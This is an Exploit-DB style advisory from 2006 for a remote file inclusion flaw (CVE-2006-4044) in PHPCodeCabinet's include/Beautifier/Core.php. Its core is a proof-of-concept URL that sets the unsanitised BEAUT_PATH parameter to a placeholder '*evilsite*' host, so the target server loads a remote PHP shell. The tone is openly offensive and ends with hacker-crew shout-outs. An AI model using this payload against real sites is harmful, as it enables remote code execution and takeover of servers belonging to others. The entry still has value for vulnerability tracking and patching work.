PHPCodeCabinet <= 0.5 Core.php Remote File Include Vulnerability

2006-08-07T00:00:00
ID EDB-ID:2139
Type exploitdb
Reporter Minion
Modified 2006-08-07T00:00:00

Description

PHPCodeCabinet <= 0.5 (Core.php) Remote File Include Vulnerability. CVE-2006-4044. Webapps exploit for php platform

                                        
                                            &gt;From Minion:

PHPCodeCabinet (all versions) is vulnerable to a remote file include.

The vulnerable code is in /include/Beautifier/Core.php

an $BEAUT_PATH Was not properly scrubbed, so they got owned.

Proof of concept:

http://target/phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php

HFile.php would be your php shell.

Shouts to XoRcrew & Disruptiv.

# milw0rm.com [2006-08-07]